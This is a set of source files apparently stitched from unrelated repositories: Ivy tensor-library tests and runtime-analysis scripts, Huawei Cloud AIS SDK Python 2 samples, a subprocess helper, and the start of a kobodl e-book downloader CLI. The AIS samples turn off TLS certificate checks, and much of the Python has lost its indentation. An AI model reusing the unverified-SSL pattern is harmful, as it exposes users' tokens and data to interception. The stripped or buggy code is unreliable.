@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_sparse_cross_entropy(t_n_p_n_res, dtype_str, tensor_fn, dev_str, call):
# smoke test
true, pred, true_target = t_n_p_n_res
pred = tensor_fn(pred, dtype_str, dev_str)
true = ivy.array(true, 'int32', dev_str)
ret = ivy.sparse_cross_entropy(true, pred)
# type test
assert ivy.is_array(ret)
# cardinality test
assert list(ret.shape) == [1]
# value test
assert np.allclose(call(ivy.sparse_cross_entropy, true, pred), np.asarray(true_target))
# compilation test
if call in [helpers.torch_call]:
# sparse_cross_entropy does not have backend implementation,
# pytorch scripting requires direct bindings to work, which bypass get_framework()
return
if not ivy.wrapped_mode():
helpers.assert_compilable(ivy.sparse_cross_entropy)
```
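The expected values hard-coded in the parametrizations above can be reproduced directly with numpy; the following stand-alone check (no ivy backend required) shows where 1.609438 and the binary cross-entropy targets come from:

```python
import numpy as np

# cross_entropy / sparse_cross_entropy target: -sum(true * log(pred)) over the class axis
true = np.array([[0., 1., 0.]])
pred = np.array([[0.3, 0.2, 0.5]])
print(-np.sum(true * np.log(pred), axis=-1))        # [1.60943791]  == -log(0.2)

# binary_cross_entropy target: elementwise -(t*log(p) + (1-t)*log(1-p))
t = np.array([[0., 1., 0.]])
p = np.array([[0.3, 0.7, 0.5]])
print(-(t * np.log(p) + (1 - t) * np.log(1 - p)))   # [[0.35667494 0.35667494 0.69314718]]
```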
#### File: Ivy/test_runtime/analyse_runtimes.py
```python
import os
import csv
import json
import numpy as np
import collections
FWS = ['numpy', 'tensorflow', 'torch', 'jax', 'mxnet']
DIM = '{}'.format(int(1e4))
os.makedirs('csvs/{}/'.format(DIM), exist_ok=True)
RATIO_MODE = 'mean'
def _reject_outliers(data, m=1):
return data[abs(data - np.mean(data)) < m * np.std(data)]
def main():
# Read Files #
# -----------#
this_dir = os.path.dirname(os.path.realpath(__file__))
core_log_dir = os.path.join(this_dir, 'test_core_runtime/runtime_analysis/{}'.format(DIM))
core_submodule_dirs = [os.path.join(core_log_dir, submodule_dir) for submodule_dir in os.listdir(core_log_dir)]
nn_log_dir = os.path.join(this_dir, 'test_nn_runtime/runtime_analysis/{}'.format(DIM))
nn_submodule_dirs = [os.path.join(nn_log_dir, submodule_dir) for submodule_dir in os.listdir(nn_log_dir)]
submodule_dirs = core_submodule_dirs + nn_submodule_dirs
filepaths = [os.path.join(submodule_dir, fname) for submodule_dir in submodule_dirs if submodule_dir[-5:] != '.json'
for fname in os.listdir(submodule_dir) if fname[0] != '_']
filepaths.sort()
all_results_dict = dict()
for fpath in filepaths:
method_name = fpath.split('/')[-1].split('.')[0]
these_results_dict = dict()
with open(fpath, 'r') as f:
lines = [l for l in f.readlines() if l != '\n']
f = None
run = -1
for l in lines:
if 'tb0:' in l:
run += 1
these_results_dict[f][run] = dict()
if l[0:13] == "<module 'ivy.":
f = l[13:].split("'")[0]
these_results_dict[f] = dict()
run = -1
elif 'end of analysis' in l:
break
else:
entry_key = l.split(': ')[0]
entry_val = l.split(': ')[1][:-1]
if entry_key not in these_results_dict[f][run]:
these_results_dict[f][run][entry_key] = list()
these_results_dict[f][run][entry_key].append(float(entry_val))
all_results_dict[method_name] = these_results_dict
# Read Reimplemented Functions #
# -----------------------------#
reimplemented_dict = {'jax': {}, 'mxnet': {}, 'numpy': {}, 'tensorflow': {}, 'torch': {}}
json_filepaths = [item for item in submodule_dirs if item[-5:] == '.json']
for json_filepath in json_filepaths:
with open(json_filepath, 'r') as file:
loaded_dict = json.loads(file.read())
reimplemented_dict['jax'] = {**reimplemented_dict['jax'], **loaded_dict['jax']}
reimplemented_dict['mxnet'] = {**reimplemented_dict['mxnet'], **loaded_dict['mxnet']}
reimplemented_dict['numpy'] = {**reimplemented_dict['numpy'], **loaded_dict['numpy']}
reimplemented_dict['tensorflow'] = {**reimplemented_dict['tensorflow'], **loaded_dict['tensorflow']}
reimplemented_dict['torch'] = {**reimplemented_dict['torch'], **loaded_dict['torch']}
# Extract Times #
# --------------#
for method, method_dict in all_results_dict.items():
for f, f_dict in method_dict.items():
# total times
if 'tt0' in f_dict[0] and 'tt1' in f_dict[0]:
total_times_ = np.asarray([run['tt1'][0] - run['tt0'][0] for run in f_dict.values()])
total_times = _reject_outliers(total_times_)
if len(total_times) == 0:
raise Exception('No data left after outlier rejection, consider increasing m.')
total_mean_time = np.mean(total_times)
else:
raise Exception('Total times do not appear to be logged.')
# backend times
if 'tb1' in f_dict[0] and 'tb2' in f_dict[0]:
backend_times_ = np.asarray([np.sum(np.asarray(run['tb2']) - np.asarray(run['tb1']))
for run in f_dict.values()])
elif 'tb3' in f_dict[0] and 'tb4' in f_dict[0]:
backend_times_ = np.asarray([run['tb4'][0] - run['tb3'][0] for run in f_dict.values()])
elif 'tb0' in f_dict[0] and 'tb4' in f_dict[0]:
backend_times_ = total_times_
else:
raise Exception('Not enough backend times logged to compute runtimes.')
backend_times = _reject_outliers(backend_times_)
if len(backend_times) == 0:
raise Exception('No data left after outlier rejection, consider increasing m.')
backend_mean_time = np.mean(backend_times)
# overhead times
if 'to0' in f_dict[0] and 'to1' in f_dict[0]:
overhead_times_ = np.asarray([np.sum(np.asarray(run['to1']) - np.asarray(run['to0']))
for run in f_dict.values()])
overhead_times = _reject_outliers(overhead_times_)
if len(overhead_times) == 0:
raise Exception('No data left after outlier rejection, consider increasing m.')
overhead_mean_time = np.mean(overhead_times)
else:
overhead_mean_time = 0
# override if it's a re-implementation
if method in reimplemented_dict[f] and reimplemented_dict[f][method] == [None]:
backend_mean_time = total_mean_time
overhead_mean_time = 0
# total time
total_mean_time = max(total_mean_time, backend_mean_time + overhead_mean_time)
# results
all_results_dict[method][f].clear()
all_results_dict[method][f]['times'] = dict()
all_results_dict[method][f]['times']['total_time'] = total_mean_time
all_results_dict[method][f]['times']['backend_time'] = backend_mean_time
all_results_dict[method][f]['times']['overhead_time'] = overhead_mean_time
all_results_dict[method][f]['times']['graph_construct_time'] = max(total_mean_time - backend_mean_time - overhead_mean_time, 0)
all_results_dict[method][f]['ratios'] = dict()
backend_ratio = min(max(backend_mean_time / total_mean_time, 0), 1)
all_results_dict[method][f]['ratios']['backend_ratio'] = backend_ratio
ivy_overhead_ratio = min(max(overhead_mean_time / total_mean_time, 0), 1)
all_results_dict[method][f]['ratios']['ivy_overhead_ratio'] = ivy_overhead_ratio
graph_construct_ratio = min(max((total_mean_time - backend_mean_time - overhead_mean_time) / total_mean_time, 0), 1)
all_results_dict[method][f]['ratios']['graph_construct_ratio'] = graph_construct_ratio
# mean times across frameworks
all_results_dict[method]['mean'] = dict()
all_results_dict[method]['mean']['times'] = dict()
all_results_dict[method]['mean']['times']['total_time'] =\
np.mean(np.asarray([all_results_dict[method][fw]['times']['total_time'] for fw in FWS
if fw in all_results_dict[method]]))
all_results_dict[method]['mean']['times']['backend_time'] =\
np.mean(np.asarray([all_results_dict[method][fw]['times']['backend_time'] for fw in FWS
if fw in all_results_dict[method]]))
all_results_dict[method]['mean']['times']['overhead_time'] =\
np.mean(np.asarray([all_results_dict[method][fw]['times']['overhead_time'] for fw in FWS
if fw in all_results_dict[method]]))
all_results_dict[method]['mean']['times']['graph_construct_time'] =\
np.mean(np.asarray([all_results_dict[method][fw]['times']['graph_construct_time'] for fw in FWS
if fw in all_results_dict[method]]))
# mean ratios across frameworks
all_results_dict[method]['mean']['ratios'] = dict()
all_results_dict[method]['mean']['ratios']['backend_ratio'] =\
np.mean(np.asarray([all_results_dict[method][fw]['ratios']['backend_ratio'] for fw in FWS
if fw in all_results_dict[method]]))
all_results_dict[method]['mean']['ratios']['ivy_overhead_ratio'] =\
np.mean(np.asarray([all_results_dict[method][fw]['ratios']['ivy_overhead_ratio'] for fw in FWS
if fw in all_results_dict[method]]))
all_results_dict[method]['mean']['ratios']['graph_construct_ratio'] =\
np.mean(np.asarray([all_results_dict[method][fw]['ratios']['graph_construct_ratio'] for fw in FWS
if fw in all_results_dict[method]]))
# Library Overhead #
# -----------------#
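    # Estimate per-library overhead: weight each method's mean times by how often the
    # library calls it, then report the share of runtime spent in ivy overhead alone
    # (compiled) and in overhead plus graph construction (eager).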
library_usage_fpath = 'library_usage.json'
if os.path.exists(library_usage_fpath):
lib_overhead_dict = dict()
with open(library_usage_fpath, 'r') as file:
usage_dict = json.loads(file.read())
for lib_name, lib_dict in usage_dict.items():
total_runtime = 0
backend_runtime = 0
overhead_runtime = 0
graph_construct_runtime = 0
            for method_name, method_occurrence in lib_dict.items():
                if method_name == 'Container':
                    continue
                tot = all_results_dict[method_name]['mean']['times']['total_time']
                total_runtime += method_occurrence * tot if not np.isnan(tot) else 0
                back = all_results_dict[method_name]['mean']['times']['backend_time']
                backend_runtime += method_occurrence * back if not np.isnan(back) else 0
                over = all_results_dict[method_name]['mean']['times']['overhead_time']
                overhead_runtime += method_occurrence * over if not np.isnan(over) else 0
                graph = all_results_dict[method_name]['mean']['times']['graph_construct_time']
                graph_construct_runtime += method_occurrence * graph if not np.isnan(graph) else 0
compiled_ratio = overhead_runtime/total_runtime
eager_ratio = (overhead_runtime + graph_construct_runtime)/total_runtime
print('\n{}:\neager_percentage: {}\ncompiled_percentage: {}\n'.format(lib_name, eager_ratio*100, compiled_ratio*100))
# Save Results #
# -------------#
for key_to_save in FWS + ['mean']:
all_results_dict_ordered = collections.OrderedDict(
sorted(all_results_dict.items(),
key=lambda key_n_val: -key_n_val[1][key_to_save]['ratios']['ivy_overhead_ratio']
- key_n_val[1][key_to_save]['ratios']['graph_construct_ratio']
if key_to_save in key_n_val[1] else 0.))
with open('csvs/{}/'.format(DIM) + key_to_save + '_runtime_analysis.csv', 'w+') as file:
csv_writer = csv.writer(file)
for method, res_dict in all_results_dict_ordered.items():
if key_to_save not in res_dict:
continue
csv_writer.writerow([method, str(res_dict[key_to_save]['ratios']['ivy_overhead_ratio']*100),
str(res_dict[key_to_save]['ratios']['graph_construct_ratio'] * 100),
str(res_dict[key_to_save]['ratios']['backend_ratio'] * 100),
'',
str(res_dict[key_to_save]['times']['overhead_time']*1000),
str(res_dict[key_to_save]['times']['graph_construct_time'] * 1000),
str(res_dict[key_to_save]['times']['backend_time']*1000)])
if __name__ == '__main__':
main()
```
#### File: test_runtime/test_core_runtime/test_linalg_runtime.py
```python
DIM = int(1e4)
# global
import os
import random
# local
import ivy.core.general as ivy_gen
import ivy.core.linalg as ivy_linalg
this_file_dir = os.path.dirname(os.path.realpath(__file__))
import with_time_logs.ivy.core.linalg as ivy_linalg_w_time
from ivy import torch as _ivy_torch
from ivy import tensorflow as _ivy_tf
from ivy import mxnet as _ivy_mxnet
from ivy import jax as _ivy_jnp
from ivy import numpy as _ivy_np
from with_time_logs.ivy import torch as _ivy_torch_w_time
from with_time_logs.ivy import tensorflow as _ivy_tf_w_time
from with_time_logs.ivy import mxnet as _ivy_mxnet_w_time
from with_time_logs.ivy import jax as _ivy_jnp_w_time
from with_time_logs.ivy import numpy as _ivy_np_w_time
LIB_DICT = {_ivy_torch: _ivy_torch_w_time,
_ivy_tf: _ivy_tf_w_time,
_ivy_mxnet: _ivy_mxnet_w_time,
_ivy_jnp: _ivy_jnp_w_time,
_ivy_np: _ivy_np_w_time}
# local
import ivy_tests.helpers as helpers
from test_runtime.utils import append_to_file, log_time, write_times, TIMES_DICT
def test_svd():
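    # Warm up both the plain and the time-logging implementations, then record backend
    # ('tb0'/'tb4') and total ('tt0'/'tt1') timestamps over 100 runs for each framework.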
fname = os.path.join(this_file_dir, 'runtime_analysis/{}/linalg/svd.txt'.format(DIM))
if os.path.exists(fname):
os.remove(fname)
for lib, call in [(l, c) for l, c in helpers.calls if c not in [helpers.tf_graph_call, helpers.mx_graph_call]]:
time_lib = LIB_DICT[lib]
append_to_file(fname, '{}'.format(lib))
x0 = ivy_gen.tensor([[[random.uniform(0, 1), random.uniform(0, 1)],
[random.uniform(0, 1), random.uniform(0, 1)]] for _ in range(DIM)], f=lib)
ivy_linalg.svd(x0, f=lib)
ivy_linalg_w_time.svd(x0, f=time_lib)
TIMES_DICT.clear()
for _ in range(100):
log_time(fname, 'tb0')
ivy_linalg_w_time.svd(x0, f=time_lib)
log_time(fname, 'tb4', time_at_start=True)
log_time(fname, 'tt0')
ivy_linalg.svd(x0, f=lib)
log_time(fname, 'tt1', time_at_start=True)
write_times()
append_to_file(fname, 'end of analysis')
def test_norm():
fname = os.path.join(this_file_dir, 'runtime_analysis/{}/linalg/norm.txt'.format(DIM))
if os.path.exists(fname):
os.remove(fname)
for lib, call in [(l, c) for l, c in helpers.calls if c not in [helpers.tf_graph_call, helpers.mx_graph_call]]:
time_lib = LIB_DICT[lib]
append_to_file(fname, '{}'.format(lib))
x0 = ivy_gen.tensor([[[random.uniform(0, 1), random.uniform(0, 1)],
[random.uniform(0, 1), random.uniform(0, 1)]] for _ in range(DIM)], f=lib)
ivy_linalg.norm(x0, f=lib)
ivy_linalg_w_time.norm(x0, f=time_lib)
TIMES_DICT.clear()
for _ in range(100):
log_time(fname, 'tb0')
ivy_linalg_w_time.norm(x0, f=time_lib)
log_time(fname, 'tb4', time_at_start=True)
log_time(fname, 'tt0')
ivy_linalg.norm(x0, f=lib)
log_time(fname, 'tt1', time_at_start=True)
write_times()
append_to_file(fname, 'end of analysis')
def test_inv():
fname = os.path.join(this_file_dir, 'runtime_analysis/{}/linalg/inv.txt'.format(DIM))
if os.path.exists(fname):
os.remove(fname)
for lib, call in [(l, c) for l, c in helpers.calls if c not in [helpers.tf_graph_call, helpers.mx_graph_call]]:
time_lib = LIB_DICT[lib]
append_to_file(fname, '{}'.format(lib))
x0 = ivy_gen.tensor([[[random.uniform(0, 1), random.uniform(0, 1)],
[random.uniform(0, 1), random.uniform(0, 1)]] for _ in range(DIM)], f=lib)
ivy_linalg.inv(x0, f=lib)
ivy_linalg_w_time.inv(x0, f=time_lib)
TIMES_DICT.clear()
for _ in range(100):
log_time(fname, 'tb0')
ivy_linalg_w_time.inv(x0, f=time_lib)
log_time(fname, 'tb4', time_at_start=True)
log_time(fname, 'tt0')
ivy_linalg.inv(x0, f=lib)
log_time(fname, 'tt1', time_at_start=True)
write_times()
append_to_file(fname, 'end of analysis')
def test_pinv():
fname = os.path.join(this_file_dir, 'runtime_analysis/{}/linalg/pinv.txt'.format(DIM))
if os.path.exists(fname):
os.remove(fname)
for lib, call in [(l, c) for l, c in helpers.calls if c not in [helpers.tf_graph_call, helpers.mx_graph_call]]:
time_lib = LIB_DICT[lib]
append_to_file(fname, '{}'.format(lib))
x0 = ivy_gen.tensor([[[random.uniform(0, 1), random.uniform(0, 1)],
[random.uniform(0, 1), random.uniform(0, 1)]] for _ in range(DIM)], f=lib)
ivy_linalg.pinv(x0, f=lib)
ivy_linalg_w_time.pinv(x0, f=time_lib)
TIMES_DICT.clear()
for _ in range(100):
log_time(fname, 'tb0')
ivy_linalg_w_time.pinv(x0, f=time_lib)
log_time(fname, 'tb4', time_at_start=True)
log_time(fname, 'tt0')
ivy_linalg.pinv(x0, f=lib)
log_time(fname, 'tt1', time_at_start=True)
write_times()
append_to_file(fname, 'end of analysis')
def test_vector_to_skew_symmetric_matrix():
fname = os.path.join(this_file_dir, 'runtime_analysis/{}/linalg/vector_to_skew_symmetric_matrix.txt'.format(DIM))
if os.path.exists(fname):
os.remove(fname)
for lib, call in [(l, c) for l, c in helpers.calls if c not in [helpers.tf_graph_call, helpers.mx_graph_call]]:
time_lib = LIB_DICT[lib]
append_to_file(fname, '{}'.format(lib))
x0 = ivy_gen.tensor([[random.uniform(0, 1), random.uniform(0, 1), random.uniform(0, 1)]
for _ in range(DIM)], f=lib)
ivy_linalg.vector_to_skew_symmetric_matrix(x0, f=lib)
ivy_linalg_w_time.vector_to_skew_symmetric_matrix(x0, f=time_lib)
TIMES_DICT.clear()
for _ in range(100):
log_time(fname, 'tb0')
ivy_linalg_w_time.vector_to_skew_symmetric_matrix(x0, f=time_lib)
log_time(fname, 'tb4', time_at_start=True)
log_time(fname, 'tt0')
ivy_linalg.vector_to_skew_symmetric_matrix(x0, f=lib)
log_time(fname, 'tt1', time_at_start=True)
write_times()
append_to_file(fname, 'end of analysis')
```
#### File: test_runtime/test_core_runtime/test_reductions_runtime.py
```python
DIM = int(1e4)
# global
import os
import random
# local
import ivy.core.general as ivy_gen
import ivy.core.reductions as ivy_red
this_file_dir = os.path.dirname(os.path.realpath(__file__))
import with_time_logs.ivy.core.reductions as ivy_red_w_time
from ivy import torch as _ivy_torch
from ivy import tensorflow as _ivy_tf
from ivy import mxnet as _ivy_mxnet
from ivy import jax as _ivy_jnp
from ivy import numpy as _ivy_np
from with_time_logs.ivy import torch as _ivy_torch_w_time
from with_time_logs.ivy import tensorflow as _ivy_tf_w_time
from with_time_logs.ivy import mxnet as _ivy_mxnet_w_time
from with_time_logs.ivy import jax as _ivy_jnp_w_time
from with_time_logs.ivy import numpy as _ivy_np_w_time
LIB_DICT = {_ivy_torch: _ivy_torch_w_time,
_ivy_tf: _ivy_tf_w_time,
_ivy_mxnet: _ivy_mxnet_w_time,
_ivy_jnp: _ivy_jnp_w_time,
_ivy_np: _ivy_np_w_time}
# local
import ivy_tests.helpers as helpers
from test_runtime.utils import append_to_file, log_time, write_times, TIMES_DICT
def test_reduce_sum():
fname = os.path.join(this_file_dir, 'runtime_analysis/{}/reductions/reduce_sum.txt'.format(DIM))
if os.path.exists(fname):
os.remove(fname)
for lib, call in [(l, c) for l, c in helpers.calls if c not in [helpers.tf_graph_call, helpers.mx_graph_call]]:
time_lib = LIB_DICT[lib]
append_to_file(fname, '{}'.format(lib))
x0 = ivy_gen.tensor([random.uniform(0, 1) for _ in range(DIM)], f=lib)
ivy_red.reduce_sum(x0, f=lib)
ivy_red_w_time.reduce_sum(x0, -1, f=time_lib)
TIMES_DICT.clear()
for _ in range(100):
log_time(fname, 'tb0')
ivy_red_w_time.reduce_sum(x0, -1, f=time_lib)
log_time(fname, 'tb4', time_at_start=True)
log_time(fname, 'tt0')
ivy_red.reduce_sum(x0, -1, f=lib)
log_time(fname, 'tt1', time_at_start=True)
write_times()
append_to_file(fname, 'end of analysis')
def test_reduce_prod():
fname = os.path.join(this_file_dir, 'runtime_analysis/{}/reductions/reduce_prod.txt'.format(DIM))
if os.path.exists(fname):
os.remove(fname)
for lib, call in [(l, c) for l, c in helpers.calls if c not in [helpers.tf_graph_call, helpers.mx_graph_call]]:
time_lib = LIB_DICT[lib]
append_to_file(fname, '{}'.format(lib))
x0 = ivy_gen.tensor([random.uniform(0, 1) for _ in range(DIM)], f=lib)
ivy_red.reduce_prod(x0, f=lib)
ivy_red_w_time.reduce_prod(x0, -1, f=time_lib)
TIMES_DICT.clear()
for _ in range(100):
log_time(fname, 'tb0')
ivy_red_w_time.reduce_prod(x0, -1, f=time_lib)
log_time(fname, 'tb4', time_at_start=True)
log_time(fname, 'tt0')
ivy_red.reduce_prod(x0, -1, f=lib)
log_time(fname, 'tt1', time_at_start=True)
write_times()
append_to_file(fname, 'end of analysis')
def test_reduce_mean():
fname = os.path.join(this_file_dir, 'runtime_analysis/{}/reductions/reduce_mean.txt'.format(DIM))
if os.path.exists(fname):
os.remove(fname)
for lib, call in [(l, c) for l, c in helpers.calls if c not in [helpers.tf_graph_call, helpers.mx_graph_call]]:
time_lib = LIB_DICT[lib]
append_to_file(fname, '{}'.format(lib))
x0 = ivy_gen.tensor([random.uniform(0, 1) for _ in range(DIM)], f=lib)
ivy_red.reduce_mean(x0, f=lib)
ivy_red_w_time.reduce_mean(x0, -1, f=time_lib)
TIMES_DICT.clear()
for _ in range(100):
log_time(fname, 'tb0')
ivy_red_w_time.reduce_mean(x0, -1, f=time_lib)
log_time(fname, 'tb4', time_at_start=True)
log_time(fname, 'tt0')
ivy_red.reduce_mean(x0, -1, f=lib)
log_time(fname, 'tt1', time_at_start=True)
write_times()
append_to_file(fname, 'end of analysis')
def test_reduce_min():
fname = os.path.join(this_file_dir, 'runtime_analysis/{}/reductions/reduce_min.txt'.format(DIM))
if os.path.exists(fname):
os.remove(fname)
for lib, call in [(l, c) for l, c in helpers.calls if c not in [helpers.tf_graph_call, helpers.mx_graph_call]]:
time_lib = LIB_DICT[lib]
append_to_file(fname, '{}'.format(lib))
x0 = ivy_gen.tensor([random.uniform(0, 1) for _ in range(DIM)], f=lib)
ivy_red.reduce_min(x0, f=lib)
ivy_red_w_time.reduce_min(x0, -1, f=time_lib)
TIMES_DICT.clear()
for _ in range(100):
log_time(fname, 'tb0')
ivy_red_w_time.reduce_min(x0, -1, f=time_lib)
log_time(fname, 'tb4', time_at_start=True)
log_time(fname, 'tt0')
ivy_red.reduce_min(x0, -1, f=lib)
log_time(fname, 'tt1', time_at_start=True)
write_times()
append_to_file(fname, 'end of analysis')
def test_reduce_max():
fname = os.path.join(this_file_dir, 'runtime_analysis/{}/reductions/reduce_max.txt'.format(DIM))
if os.path.exists(fname):
os.remove(fname)
for lib, call in [(l, c) for l, c in helpers.calls if c not in [helpers.tf_graph_call, helpers.mx_graph_call]]:
time_lib = LIB_DICT[lib]
append_to_file(fname, '{}'.format(lib))
x0 = ivy_gen.tensor([random.uniform(0, 1) for _ in range(DIM)], f=lib)
ivy_red.reduce_max(x0, f=lib)
ivy_red_w_time.reduce_max(x0, -1, f=time_lib)
TIMES_DICT.clear()
for _ in range(100):
log_time(fname, 'tb0')
ivy_red_w_time.reduce_max(x0, -1, f=time_lib)
log_time(fname, 'tb4', time_at_start=True)
log_time(fname, 'tt0')
ivy_red.reduce_max(x0, -1, f=lib)
log_time(fname, 'tt1', time_at_start=True)
write_times()
append_to_file(fname, 'end of analysis')
``` |
{
"source": "798000648/ais-sdk",
"score": 3
} |
#### File: rest-client-samples/asr/long_sentence.py
```python
import urllib2
import json
import time
import ssl
from gettoken import get_token
from utils import encode_to_base64
from urllib2 import HTTPError, URLError
#
# access asr, long_sentence
#
def long_sentence(token, data, url=''):
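    #
    # Submit the long-sentence ASR job, then poll every two seconds until it
    # finishes (status 2), fails (status -1), or the request itself errors out.
    #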
status, r = _long_sentence(token, data, url)
if status != 200:
        print 'Process long sentence asr failed: submit job failed.'
return ''
submit_result = json.loads(r)
job_id = submit_result['result'].get('job_id', '')
print "Process job id is :", job_id
words = ''
time.sleep(1.0)
try:
while True:
status, r = _get_result(token, job_id)
if status != 200:
print 'Process long sentence asr failed: get result failed.'
break
rec_result = json.loads(r)
process_status = rec_result["result"].get('status_code', 1)
if process_status == -1:
print 'Process long sentence asr failed: get result failed.'
break
elif process_status == 2:
words = rec_result["result"].get('words', '')
break
#
# process_status == 0 || process_status == 1
#
else:
time.sleep(2.0)
continue
except Exception:
return ''
return words
#
# long_sentence, post the data
#
def _long_sentence(token, data, url):
_url = 'https://ais.cn-north-1.myhuaweicloud.com/v1.0/voice/asr/long-sentence'
_data = {
"url":url,
"data": data
}
kreq = urllib2.Request( url = _url)
kreq.add_header('Content-Type', 'application/json')
kreq.add_header('X-Auth-Token', token )
kreq.add_data(json.dumps(_data))
resp = None
status_code = None
try:
        #
        # Use an unverified SSL context because client CA validation
        # has problems in FunctionStage.
        #
_context = ssl._create_unverified_context()
r = urllib2.urlopen(kreq, context=_context)
        #
        # Catch HTTPError and URLError because urllib2 cannot handle 4XX and
        # 5XX responses within a single urlopen call.
        #
        # A higher-level HTTP client library such as requests does not have
        # this problem.
        #
except HTTPError, e:
resp = e.read()
status_code = e.code
except URLError, e:
resp = e.read()
status_code = e.code
else:
status_code = r.code
resp = r.read()
return status_code, resp
#
# access asr, long_sentence, get the result
#
def _get_result(token, job_id):
_url_tmpl = 'https://ais.cn-north-1.myhuaweicloud.com/v1.0/voice/asr/long-sentence?job_id=%s'
_url = _url_tmpl % job_id
kreq = urllib2.Request( url = _url)
kreq.add_header('X-Auth-Token', token )
kreq.add_header('Content-Type', 'application/json')
resp = None
status_code = None
try:
        #
        # Use an unverified SSL context because client CA validation
        # has problems in FunctionStage.
        #
_context = ssl._create_unverified_context()
r = urllib2.urlopen(kreq, context=_context)
        #
        # Catch HTTPError and URLError because urllib2 cannot handle 4XX and
        # 5XX responses within a single urlopen call.
        #
        # A higher-level HTTP client library such as requests does not have
        # this problem.
        #
except HTTPError, e:
resp = e.read()
status_code = e.code
except URLError, e:
resp = e.read()
status_code = e.code
else:
status_code = r.code
resp = r.read()
return status_code, resp
if __name__ == '__main__':
user_name = '******'
password = '******'
account_name = '******' # the same as user_name in commonly use
demo_data_url = 'https://ais-sample-data.obs.myhwclouds.com/lsr-1.mp3'
token = get_token(user_name, password, account_name)
    # call the interface with a URL
result = long_sentence(token, '', demo_data_url)
print result
    # call the interface with a local file (base64-encoded)
result = long_sentence(token, encode_to_base64('data/asr-sentence.wav'))
print result
```
#### File: rest-client-samples/image/obs_adapter.py
```python
from com.obs.client.obs_client import ObsClient
import uuid
import sys
import os
import time
import urllib2
from urllib2 import HTTPError, URLError
def upload_file_2_obs(client, bucket, prefix, local_file, expires = 3600):
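    # Upload the local file to OBS under a unique object key and return a signed GET URL for it.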
object_key = "%s_%s_%s" %(prefix, str(uuid.uuid1()), open(local_file, 'r').name)
#upload file
resp = client.putFile(bucket, object_key, file_path=local_file)
if resp.status >= 300:
return False, resp.errorMessage, ''
method='GET'
res = client.createV2SignedUrl(method, bucket, object_key)
return True, object_key, res['signedUrl']
def download_url_file(url, file_name):
try:
r = urllib2.urlopen(url)
except HTTPError, e:
resp = e.read()
rc = e.code
except URLError, e:
resp = e.read()
rc = e.code
else:
resp = r.read()
rc = r.code
if rc != 200:
return False
f = open(file_name, 'wb')
f.write(resp)
f.close()
return True
#1. download web url to import obs
#2. get obs read temp url
def change_weburl_2_obs(url, client, bucket, prefix, temp_file):
if not download_url_file(url, temp_file):
return False, ''
flag, key, url = upload_file_2_obs(client, bucket, prefix, temp_file)
os.remove(temp_file)
return flag, url
if __name__ == "__main__":
client = ObsClient(
access_key_id='OBS AK',
secret_access_key='OBS SK',
server='obs.cn-north-1.myhwclouds.com'
)
bucket = 'bucketXXX'
print change_weburl_2_obs('http://c.hiphotos.baidu.com/image/pic/item/ae51f3deb48f8c540e2d1dd336292df5e1fe7f54.jpg', client, bucket, 'WEBURL', 'a.jpg')
client.close()
#print upload_file_2_obs(client, bucket, 'MANUAL', 'a.jpg')
#print download_url_file('http://c.hiphotos.baidu.com/image/pic/item/ae51f3deb48f8c540e2d1dd336292df5e1fe7f54.jpg', 'a.jpg')
```
#### File: sdk/core/gettoken.py
```python
import urllib2
import json
def get_token(username, password, domain):
auth_data = {
"auth": {
"identity": {
"password": {
"user": {
"name": username,
"password": password,
"domain": {
"name": domain
}
}
},
"methods": [
"password"
]
},
"scope": {
"project": {
"name": "cn-north-1"
}
}
}
}
_url = 'https://iam.cn-north-1.myhuaweicloud.com/v3/auth/tokens'
req = urllib2.Request( url = _url)
req.add_header('Content-Type', 'application/json')
req.add_data(json.dumps(auth_data))
r = urllib2.urlopen(req)
X_TOKEN = r.headers['X-Subject-Token']
return X_TOKEN
``` |
{
"source": "79laowang/Python_scripts",
"score": 3
} |
#### File: 79laowang/Python_scripts/run-cmd.py
```python
import sys
import subprocess
def run_command(command, wait=False):
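    # Run a shell command; with wait=True block and capture stdout through a pipe,
    # otherwise launch the command detached from this process.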
    result = None
    try:
if (wait):
p = subprocess.Popen(
[command],
stdout = subprocess.PIPE,
shell = True)
p.wait()
else:
p = subprocess.Popen(
[command],
shell = True,
stdin = None, stdout = None, stderr = None, close_fds = True)
(result, error) = p.communicate()
except subprocess.CalledProcessError as e:
sys.stderr.write(
"common::run_command() : [ERROR]: output = %s, error code = %s\n"
% (e.output, e.returncode))
return result
def main():
run_command('ls -l /tmp')
if __name__ == '__main__':
main()
``` |
{
"source": "7a6163/kobo-book-downloader",
"score": 2
} |
#### File: kobodl/commands/book.py
```python
import os
import click
from tabulate import tabulate
from kobodl import actions, cli
from kobodl.globals import Globals
def decorators(book):
append = ''
if book.Audiobook:
append += ' (🎧 Audiobook)'
if book.Archived:
append += ' (🗄️ Archived)'
return append
@click.group(name='book', short_help='list and download books')
def book():
pass
@book.command(name='get', short_help='download book')
@click.option(
'-u',
'--user',
type=click.STRING,
help='Required when multiple accounts exist. Use either Email or UserKey',
)
@click.option(
'-o',
'--output-dir',
type=click.Path(file_okay=False, dir_okay=True, writable=True),
default='kobo_downloads',
)
@click.option('-a', '--get-all', is_flag=True)
@click.argument('product-id', nargs=-1, type=click.STRING)
@click.pass_obj
def get(ctx, user, output_dir, get_all, product_id):
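    # Resolve which configured user to download as, validate the --get-all/product-id
    # combination, then fetch either the whole library or the requested products.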
if len(Globals.Settings.UserList.users) == 0:
click.echo('error: no users found. Did you `kobodl user add`?', err=True)
exit(1)
if not user:
if len(Globals.Settings.UserList.users) > 1:
click.echo('error: must provide --user option when more than 1 user exists.')
exit(1)
# Exactly 1 user account exists
usercls = Globals.Settings.UserList.users[0]
else:
# A user was passed
usercls = Globals.Settings.UserList.getUser(user)
if not usercls:
click.echo(f'error: could not find user with name or id {user}')
exit(1)
if get_all and len(product_id):
click.echo(
'error: cannot pass product IDs when --get-all is used. Use one or the other.',
err=True,
)
exit(1)
if not get_all and len(product_id) == 0:
click.echo('error: must pass at least one Product ID, or use --get-all', err=True)
exit(1)
os.makedirs(output_dir, exist_ok=True)
if get_all:
actions.GetBookOrBooks(usercls, output_dir)
else:
for pid in product_id:
output = actions.GetBookOrBooks(usercls, output_dir, productId=pid)
@book.command(name='list', help='list books')
@click.option(
'-u',
'--user',
type=click.STRING,
required=False,
help='Limit list to a single user. Use either Email or UserKey',
)
@click.option('--read', is_flag=True, help='include books marked as read')
@click.option(
'--export-library',
type=click.File(mode='w'),
help='filepath to write raw JSON library data to.',
)
@click.pass_obj
def list(ctx, user, read, export_library):
userlist = Globals.Settings.UserList.users
if user:
